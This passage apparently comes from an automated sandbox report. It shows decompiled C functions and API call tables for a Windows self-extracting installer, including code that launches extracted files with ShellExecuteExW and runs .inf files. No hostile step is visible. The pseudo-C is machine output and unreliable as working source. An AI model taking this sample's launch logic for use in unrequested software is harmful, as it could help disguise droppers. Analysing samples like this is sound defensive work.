          0x0020baed
          0x0020bacb
          0x0020bacb
          0x0020bace
          0x0020bae1
          0x0020bad0
          0x0020bad0
          0x0020bad2
          0x0020bad7
          0x0020bad7
          0x0020bace
          0x00000000
          0x00000000
          0x0020bb31
          0x0020bb32
          0x0020bb37
          0x0020bb37
          0x0020bb37
          0x0020bb3a
          0x0020bb3f
          0x0020bb45
          0x0020bb45
          0x0020bb4b
          0x0020bb51
          0x0020bb51
          0x00000000
          0x00000000
          0x0020b52a
          0x0020b52c
          0x0020b531
          0x0020b537
          0x0020b53a
          0x00000000
          0x0020b53c
          0x0020b53c
          0x00000000
          0x0020b53c
          0x0020c093
          0x0020c093
          0x0020c098
          0x0020c09c
          0x0020c0a0
          0x0020c0a7
          0x0020c0ae
          0x0020c0b1
          0x0020c0b6
          0x0020c0b9
          0x0020c0bc
          0x0020c0c6

          APIs
          • __EH_prolog.LIBCMT ref: 0020B4CC
            • Part of subcall function 0020A156: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0020A21E
          • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,0020ADDF,?,00000000), ref: 0020B601
          • GetFileAttributesW.KERNEL32(?), ref: 0020B6BB
          • DeleteFileW.KERNEL32(?), ref: 0020B6C9
          • SetWindowTextW.USER32(?,?), ref: 0020B812
          • _wcsrchr.LIBVCRUNTIME ref: 0020B99C
          • GetDlgItem.USER32(?,00000066), ref: 0020B9D7
          • SetWindowTextW.USER32(00000000,?), ref: 0020B9E7
          • SendMessageW.USER32(00000000,00000143,00000000,00239602), ref: 0020B9FB
          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0020BA24
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
          • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
          • API String ID: 3676479488-312220925
          • Opcode ID: ece128f5bf2f5aba108d7aaeab7cb32fbf0553ae2eb25db474b17079e346f3ad
          • Instruction ID: fb200c0e3def1bbb2ae41c34cd513708c36d1fad63506209d5f9875cd1d95ece
          • Opcode Fuzzy Hash: ece128f5bf2f5aba108d7aaeab7cb32fbf0553ae2eb25db474b17079e346f3ad
          • Instruction Fuzzy Hash: C2E17176910219AAEF25EFA0DD85EEE737CEF14350F1041A6F509E3092EB709B948F60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020C190, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E0020C190(intOrPtr _a4, long _a8) {
				char _v67;
				intOrPtr _v72;
				signed int _v84;
				int _v88;
				void* _v92;
				intOrPtr _t40;
				intOrPtr _t43;
				struct HWND__* _t45;
				char _t48;

				E0020A388(); // executed
				_t45 = GetDlgItem( *0x2375c8, 0x68);
				_t48 =  *0x2375d6; // 0x1
				if(_t48 == 0) {
					_t43 =  *0x2375e8; // 0x0
					E00208569(_t43);
					ShowWindow(_t45, 5); // executed
					SendMessageW(_t45, 0xb1, 0, 0xffffffff);
					SendMessageW(_t45, 0xc2, 0, 0x2222e4);
					 *0x2375d6 = 1;
				}
				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
				_v92 = 0x5c;
				SendMessageW(_t45, 0x43a, 0,  &_v92);
				_v67 = 0;
				_t40 = _a4;
				_v88 = 1;
				if(_t40 != 0) {
					_v72 = 0xa0;
					_v88 = 0x40000001;
					_v84 = _v84 & 0xbfffffff | 1;
				}
				SendMessageW(_t45, 0x444, 1,  &_v92);
				SendMessageW(_t45, 0xc2, 0, _a8);
				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t40 != 0) {
					_v84 = _v84 & 0xfffffffe | 0x40000000;
					SendMessageW(_t45, 0x444, 1,  &_v92);
				}
				return SendMessageW(_t45, 0xc2, 0, L"\r\n");
			}












          0x0020c197
          0x0020c1b2
          0x0020c1b9
          0x0020c1bf
          0x0020c1c1
          0x0020c1c7
          0x0020c1cf
          0x0020c1de
          0x0020c1e8
          0x0020c1ea
          0x0020c1ea
          0x0020c1fe
          0x0020c204
          0x0020c214
          0x0020c218
          0x0020c21c
          0x0020c221
          0x0020c227
          0x0020c232
          0x0020c23c
          0x0020c244
          0x0020c244
          0x0020c254
          0x0020c25e
          0x0020c26d
          0x0020c271
          0x0020c27f
          0x0020c290
          0x0020c290
          0x0020c2a4

          APIs
            • Part of subcall function 0020A388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0020A399
            • Part of subcall function 0020A388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0020A3AA
            • Part of subcall function 0020A388: IsDialogMessageW.USER32(000F004A,?), ref: 0020A3BE
            • Part of subcall function 0020A388: TranslateMessage.USER32(?), ref: 0020A3CC
            • Part of subcall function 0020A388: DispatchMessageW.USER32(?), ref: 0020A3D6
          • GetDlgItem.USER32(00000068,0024DE38), ref: 0020C1A4
          • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00209D8F), ref: 0020C1CF
          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0020C1DE
          • SendMessageW.USER32(00000000,000000C2,00000000,002222E4), ref: 0020C1E8
          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0020C1FE
          • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0020C214
          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0020C254
          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0020C25E
          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0020C26D
          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0020C290
          • SendMessageW.USER32(00000000,000000C2,00000000,0022304C), ref: 0020C29B
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
          • String ID: \
          • API String ID: 3569833718-2967466578
          • Opcode ID: 0ef0c8a825c94b9add8740dbb399cb2796d16f0c1d2e0277367baebcb7e19b58
          • Instruction ID: f2326b8046325fd4dc97505637d119c872dbb57f9dba92dfaedfa26eb504b0fd
          • Opcode Fuzzy Hash: 0ef0c8a825c94b9add8740dbb399cb2796d16f0c1d2e0277367baebcb7e19b58
          • Instruction Fuzzy Hash: B92134B12493047BE321FF24AC45FAF7F9CEF82754F400609FA90961D1C7A55A098ABB
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020C431, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
          Download Yara Rule
          C-Code - Quality: 48%
          			E0020C431(struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, int _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, signed short* _a4168, intOrPtr _a4172) {
				signed short _v0;
				long _v12;
				void* __edi;
				int _t54;
				signed int _t57;
				signed short* _t58;
				long _t68;
				int _t77;
				signed int _t80;
				signed short* _t81;
				signed short _t82;
				intOrPtr _t84;
				long _t86;
				signed short* _t87;
				struct HWND__* _t89;
				signed short* _t91;
				void* _t93;
				void* _t95;
				void* _t99;

				_t54 = 0x1040;
				E0020D940();
				_t91 = _a4168;
				_t77 = 0;
				if( *_t91 == 0) {
					L55:
					return _t54;
				}
				_t54 = E00212B33(_t91);
				if(0x1040 >= 0x7f6) {
					goto L55;
				} else {
					_t86 = 0x3c;
					E0020E920(_t86,  &_a4, 0, _t86);
					_t84 = _a4172;
					_t99 = _t99 + 0xc;
					_a4.cbSize = _t86;
					_a8 = 0x1c0;
					if(_t84 != 0) {
						_a8 = 0x5c0;
					}
					_t80 =  *_t91 & 0x0000ffff;
					_t87 =  &(_t91[1]);
					_t95 = 0x22;
					if(_t80 != _t95) {
						_t87 = _t91;
					}
					_a20 = _t87;
					_t57 = _t77;
					if(_t80 == 0) {
						L13:
						_t58 = _a24;
						L14:
						if(_t58 == 0 ||  *_t58 == _t77) {
							if(_t84 == 0 &&  *0x23a602 != _t77) {
								_a24 = 0x23a602;
							}
						}
						_a32 = 1;
						_t93 = E001FB153(_t87);
						if(_t93 != 0 && E00201410(_t93, L".inf") == 0) {
							_a16 = L"Install";
						}
						if(E001F9E6B(_a20) != 0) {
							_push(0x800);
							_push( &_a64);
							_push(_a20);
							E001FAED7();
							_a8 =  &_a52;
						}
						_t54 = ShellExecuteExW( &_a4); // executed
						if(_t54 != 0) {
							_t89 = _a4160;
							if( *0x2385f8 != _t77 || _a4168 != _t77 ||  *0x24de21 != _t77) {
								if(_t89 != 0) {
									_push(_t89);
									if( *0x22df24() != 0) {
										ShowWindow(_t89, _t77);
										_t77 = 1;
									}
								}
								 *0x22df20(_a56, 0x7d0);
								E0020C8F0(_a48);
								if( *0x24de21 != 0 && _a4160 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
									_t68 = _v12;
									if(_t68 >  *0x24de24) {
										 *0x24de24 = _t68;
									}
									 *0x24de22 = 1;
								}
							}
							CloseHandle(_a48);
							if(_t93 == 0 || E00201410(_t93, L".exe") != 0) {
								_t54 = _a4160;
								if( *0x2385f8 != 0 && _t54 == 0 &&  *0x24de21 == _t54) {
									 *0x24de28 = 0x1b58;
								}
							} else {
								_t54 = _a4160;
							}
							if(_t77 != 0 && _t54 != 0) {
								_t54 = ShowWindow(_t89, 1);
							}
						}
						goto L55;
					}
					_t81 = _t91;
					_v0 = 0x20;
					do {
						if( *_t81 == _t95) {
							while(1) {
								_t57 = _t57 + 1;
								if(_t91[_t57] == _t77) {
									break;
								}
								if(_t91[_t57] == _t95) {
									_t82 = _v0;
									_t91[_t57] = _t82;
									L10:
									if(_t91[_t57] == _t82 ||  *((short*)(_t91 + 2 + _t57 * 2)) == 0x2f) {
										if(_t91[_t57] == _v0) {
											_t91[_t57] = 0;
										}
										_t58 =  &(_t91[_t57 + 1]);
										_a24 = _t58;
										goto L14;
									} else {
										goto L12;
									}
								}
							}
						}
						_t82 = _v0;
						goto L10;
						L12:
						_t57 = _t57 + 1;
						_t81 =  &(_t91[_t57]);
					} while ( *_t81 != _t77);
					goto L13;
				}
			}






















          0x0020c431
          0x0020c436
          0x0020c43d
          0x0020c444
          0x0020c449
          0x0020c695
          0x0020c69d
          0x0020c69d
          0x0020c450
          0x0020c45b
          0x00000000
          0x0020c461
          0x0020c464
          0x0020c46c
          0x0020c471
          0x0020c478
          0x0020c47b
          0x0020c47f
          0x0020c489
          0x0020c48b
          0x0020c48b
          0x0020c493
          0x0020c496
          0x0020c49c
          0x0020c4a0
          0x0020c4a2
          0x0020c4a2
          0x0020c4a4
          0x0020c4a8
          0x0020c4ad
          0x0020c4e5
          0x0020c4e5
          0x0020c4e9
          0x0020c4eb
          0x0020c4f4
          0x0020c4ff
          0x0020c4ff
          0x0020c4f4
          0x0020c508
          0x0020c515
          0x0020c519
          0x0020c52a
          0x0020c52a
          0x0020c53d
          0x0020c53f
          0x0020c548
          0x0020c549
          0x0020c54d
          0x0020c556
          0x0020c556
          0x0020c55f
          0x0020c567
          0x0020c56d
          0x0020c580
          0x0020c595
          0x0020c597
          0x0020c5a0
          0x0020c5a4
          0x0020c5a6
          0x0020c5a6
          0x0020c5a0
          0x0020c5b1
          0x0020c5bb
          0x0020c5c7
          0x0020c5e6
          0x0020c5f0
          0x0020c5f2
          0x0020c5f2
          0x0020c5f7
          0x0020c5f7
          0x0020c5c7
          0x0020c602
          0x0020c60a
          0x0020c622
          0x0020c629
          0x0020c637
          0x0020c637
          0x0020c67f
          0x0020c67f
          0x0020c67f
          0x0020c688
          0x0020c691
          0x0020c691
          0x0020c688
          0x00000000
          0x0020c694
          0x0020c4af
          0x0020c4b1
          0x0020c4b9
          0x0020c4bc
          0x0020c649
          0x0020c649
          0x0020c64e
          0x00000000
          0x00000000
          0x0020c647
          0x0020c655
          0x0020c659
          0x0020c4c6
          0x0020c4ca
          0x0020c66a
          0x0020c66e
          0x0020c66e
          0x0020c673
          0x0020c676
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x0020c4ca
          0x0020c647
          0x0020c650
          0x0020c4c2
          0x00000000
          0x0020c4dc
          0x0020c4dc
          0x0020c4dd
          0x0020c4e0
          0x00000000
          0x0020c4b9

          APIs
          • ShellExecuteExW.SHELL32(000001C0), ref: 0020C55F
          • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 0020C5A4
          • GetExitCodeProcess.KERNEL32 ref: 0020C5DC
          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0020C602
          • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 0020C691
            • Part of subcall function 00201410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,001FACFE,?,?,?,001FACAD,?,-00000002,?,00000000,?), ref: 00201426
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
          • String ID: $.exe$.inf
          • API String ID: 3686203788-2452507128
          • Opcode ID: b8d665eb90e158ee6dbd86df769839f82ae62ebfe97c33495c16da550bdd2914
          • Instruction ID: 9a7266b06284b96944c7abd3cec1cccb5bbd193a244df106c7ebfeab8d0ae9b1
          • Opcode Fuzzy Hash: b8d665eb90e158ee6dbd86df769839f82ae62ebfe97c33495c16da550bdd2914
          • Instruction Fuzzy Hash: 7D5158B00283419AC731DF60E904B7B7BE8EF85304F240A1DF4C1A71E2D7B29968CB52
          Uniqueness

          Uniqueness Score: -1.00%

          Function 002195A5, Relevance: 9.2, APIs: 6, Instructions: 216COMMON
          Download Yara Rule
          C-Code - Quality: 71%
          			E002195A5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t57;
				signed int _t59;
				short* _t61;
				signed int _t65;
				short* _t69;
				int _t77;
				short* _t80;
				signed int _t86;
				signed int _t89;
				void* _t94;
				void* _t95;
				int _t97;
				short* _t100;
				int _t102;
				int _t104;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x22d668; // 0x4319796a
				_v8 = _t49 ^ _t105;
				_push(__esi);
				_t102 = _a20;
				if(_t102 > 0) {
					_t77 = E0021DBBC(_a16, _t102);
					_t109 = _t77 - _t102;
					_t4 = _t77 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t77;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E0020E203(_t54, _v8 ^ _t105);
				} else {
					_t94 = _t54 + _t54;
					_t84 = _t94 + 8;
					asm("sbb eax, eax");
					if((_t94 + 0x00000008 & _t54) == 0) {
						_t80 = 0;
						__eflags = 0;
						L14:
						if(_t80 == 0) {
							L36:
							_t104 = 0;
							L37:
							E0021980D(_t80);
							_t54 = _t104;
							goto L38;
						}
						_t57 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t80, _v12);
						_t120 = _t57;
						if(_t57 == 0) {
							goto L36;
						}
						_t99 = _v12;
						_t59 = E00219C64(_t84, _t102, _t120, _a8, _a12, _t80, _v12, 0, 0, 0, 0, 0); // executed
						_t104 = _t59;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t86 = _t95 + 8;
							__eflags = _t95 - _t86;
							asm("sbb eax, eax");
							__eflags = _t86 & _t59;
							if((_t86 & _t59) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E0021980D(_t100);
									goto L36;
								}
								_t61 = E00219C64(_t86, _t104, __eflags, _a8, _a12, _t80, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E0021980D(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t89 = _t95 + 8;
							__eflags = _t95 - _t89;
							asm("sbb eax, eax");
							_t65 = _t59 & _t89;
							_t86 = _t95 + 8;
							__eflags = _t65 - 0x400;
							if(_t65 > 0x400) {
								__eflags = _t95 - _t86;
								asm("sbb eax, eax");
								_t100 = E00217A8A(_t86, _t65 & _t86);
								_pop(_t86);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t86;
							asm("sbb eax, eax");
							E00220EE0();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t69 = _a28;
						if(_t69 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t69;
						if(_t104 > _t69) {
							goto L36;
						}
						_t104 = E00219C64(0, _t104, _t124, _a8, _a12, _t80, _t99, _a24, _t69, 0, 0, 0);
						if(_t104 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t71 = _t54 & _t94 + 0x00000008;
					_t84 = _t94 + 8;
					if((_t54 & _t94 + 0x00000008) > 0x400) {
						__eflags = _t94 - _t84;
						asm("sbb eax, eax");
						_t80 = E00217A8A(_t84, _t71 & _t84);
						_pop(_t84);
						__eflags = _t80;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t80 = 0xdddd;
						L12:
						_t80 =  &(_t80[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00220EE0();
					_t80 = _t106;
					if(_t80 == 0) {
						goto L36;
					}
					 *_t80 = 0xcccc;
					goto L12;
				}
			}


























          0x002195aa
          0x002195ab
          0x002195ac
          0x002195b3
          0x002195b7
          0x002195b8
          0x002195be
          0x002195c4
          0x002195ca
          0x002195cd
          0x002195cd
          0x002195d0
          0x002195d2
          0x002195d2
          0x002195d0
          0x002195d4
          0x002195d9
          0x002195e0
          0x002195e3
          0x002195e3
          0x002195ff
          0x00219605
          0x0021960a
          0x0021979d
          0x002197b0
          0x00219610
          0x00219610
          0x00219613
          0x00219618
          0x0021961c
          0x00219670
          0x00219670
          0x00219672
          0x00219674
          0x00219792
          0x00219792
          0x00219794
          0x00219795
          0x0021979b
          0x00000000
          0x0021979b
          0x00219685
          0x0021968b
          0x0021968d
          0x00000000
          0x00000000
          0x00219693
          0x002196a5
          0x002196aa
          0x002196ae
          0x00000000
          0x00000000
          0x002196bb
          0x002196f5
          0x002196f8
          0x002196fb
          0x002196fd
          0x002196ff
          0x00219701
          0x0021974d
          0x0021974d
          0x0021974f
          0x0021974f
          0x00219751
          0x0021978b
          0x0021978c
          0x00000000
          0x00219791
          0x00219765
          0x0021976a
          0x0021976c
          0x00000000
          0x00000000
          0x00219770
          0x00219771
          0x00219772
          0x00219775
          0x002197b1
          0x002197b4
          0x00219777
          0x00219777
          0x00219778
          0x00219778
          0x00219785
          0x00219787
          0x00219789
          0x002197ba
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00219789
          0x00219703
          0x00219706
          0x00219708
          0x0021970a
          0x0021970c
          0x0021970f
          0x00219714
          0x0021972f
          0x00219731
          0x0021973b
          0x0021973d
          0x0021973e
          0x00219740
          0x00000000
          0x00000000
          0x00219742
          0x00219748
          0x00219748
          0x00000000
          0x00219748
          0x00219716
          0x00219718
          0x0021971c
          0x00219721
          0x00219723
          0x00219725
          0x00000000
          0x00000000
          0x00219727
          0x00000000
          0x00219727
          0x002196bd
          0x002196c2
          0x00000000
          0x00000000
          0x002196c8
          0x002196ca
          0x00000000
          0x00000000
          0x002196e6
          0x002196ea
          0x00000000
          0x00000000
          0x00000000
          0x002196f0
          0x00219623
          0x00219625
          0x00219627
          0x0021962f
          0x0021964e
          0x00219650
          0x0021965a
          0x0021965c
          0x0021965d
          0x0021965f
          0x00000000
          0x00000000
          0x00219665
          0x0021966b
          0x0021966b
          0x00000000
          0x0021966b
          0x00219633
          0x00219637
          0x0021963c
          0x00219640
          0x00000000
          0x00000000
          0x00219646
          0x00000000
          0x00219646

          APIs
          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0021451B,0021451B,?,?,?,002197F6,00000001,00000001,31E85006), ref: 002195FF
          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002197F6,00000001,00000001,31E85006,?,?,?), ref: 00219685
          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,31E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0021977F
          • __freea.LIBCMT ref: 0021978C
            • Part of subcall function 00217A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00212FA6,?,0000015D,?,?,?,?,00214482,000000FF,00000000,?,?), ref: 00217ABC
          • __freea.LIBCMT ref: 00219795
          • __freea.LIBCMT ref: 002197BA
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ByteCharMultiWide__freea$AllocateHeap
          • String ID:
          • API String ID: 1414292761-0
          • Opcode ID: 0d95f81dce344a8df32a72d4f9f677f3debd63f7560167a9bde3189d9db2f68c
          • Instruction ID: 18ded262519fa12feb4243d83be2487ef7d82461fa3fe236545c3ca47975631d
          • Opcode Fuzzy Hash: 0d95f81dce344a8df32a72d4f9f677f3debd63f7560167a9bde3189d9db2f68c
          • Instruction Fuzzy Hash: CC51C6B2630216AEDB259F64CC91EFAB7E9DF54750F154628FC05D6180DB34DCE1CAA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00209A32, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E00209A32(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E00201410( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}








          0x00209a42
          0x00209a49
          0x00209a51
          0x00209a54
          0x00209a61
          0x00209a68
          0x00209a70
          0x00209a76
          0x00209a76
          0x00209a78
          0x00209a7b
          0x00209a80
          0x00000000
          0x00209a80
          0x00209a8a

          APIs
          • GetClassNameW.USER32(?,?,00000050), ref: 00209A49
          • SHAutoComplete.SHLWAPI(?,00000010), ref: 00209A80
            • Part of subcall function 00201410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,001FACFE,?,?,?,001FACAD,?,-00000002,?,00000000,?), ref: 00201426
          • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00209A70
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AutoClassCompareCompleteFindNameStringWindow
          • String ID: EDIT$pltv
          • API String ID: 4243998846-1976670045
          • Opcode ID: db9568fadae7d02784ee17273c2671d9730c5dc412e4d2611a82283d05582566
          • Instruction ID: ee6c3d48d35fed365bea6b099a20391549e9611adc41a701c632896b276c4b38
          • Opcode Fuzzy Hash: db9568fadae7d02784ee17273c2671d9730c5dc412e4d2611a82283d05582566
          • Instruction Fuzzy Hash: 18F0E932B1032837D7309AA46C09FEB776C9B46B00F040155FD01A30C1D764995286F9
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F9768, Relevance: 7.6, APIs: 5, Instructions: 116filetimeCOMMON
          Download Yara Rule
          C-Code - Quality: 94%
          			E001F9768(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
				long _v0;
				void* _t48;
				long _t59;
				unsigned int _t61;
				long _t64;
				signed int _t65;
				char _t68;
				void* _t72;
				void* _t74;
				long _t78;
				void* _t81;

				_t74 = __esi;
				E0020D940();
				_t61 = _a4188;
				_t72 = __ecx;
				 *(__ecx + 0x1020) =  *(__ecx + 0x1020) & 0x00000000;
				if( *((char*)(__ecx + 0x1d)) != 0 || (_t61 & 0x00000004) != 0) {
					_t68 = 1;
				} else {
					_t68 = 0;
				}
				_push(_t74);
				asm("sbb esi, esi");
				_t78 = ( ~(_t61 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
				if((_t61 & 0x00000001) != 0) {
					_t78 = _t78 | 0x40000000;
				}
				_t64 =  !(_t61 >> 3) & 0x00000001;
				if(_t68 != 0) {
					_t64 = _t64 | 0x00000002;
				}
				_v0 = (0 |  *((intOrPtr*)(_t72 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
				E001F6EF9( &_a12);
				if( *((char*)(_t72 + 0x1c)) != 0) {
					_t78 = _t78 | 0x00000100;
				}
				_t48 = CreateFileW(_a4184, _t78, _t64, 0, 3, _v0, 0); // executed
				_t81 = _t48;
				if(_t81 != 0xffffffff) {
					L17:
					if( *((char*)(_t72 + 0x1c)) != 0 && _t81 != 0xffffffff) {
						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
						_a8 = _a8 | 0xffffffff;
						SetFileTime(_t81, 0,  &_a4, 0);
					}
					 *((char*)(_t72 + 0x12)) = 0;
					_t65 = _t64 & 0xffffff00 | _t81 != 0xffffffff;
					 *((intOrPtr*)(_t72 + 0xc)) = 0;
					 *((char*)(_t72 + 0x10)) = 0;
					if(_t81 != 0xffffffff) {
						 *(_t72 + 4) = _t81;
						E001FFAB1(_t72 + 0x1e, _a4184, 0x800);
					}
					return _t65;
				} else {
					_a4.dwLowDateTime = GetLastError();
					if(E001FB32C(_a4184,  &_a12, 0x800) == 0) {
						L15:
						if(_a4.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t72 + 0x1020)) = 1;
						}
						goto L17;
					}
					_t81 = CreateFileW( &_a12, _t78, _t64, 0, 3, _v0, 0);
					_t59 = GetLastError();
					if(_t59 == 2) {
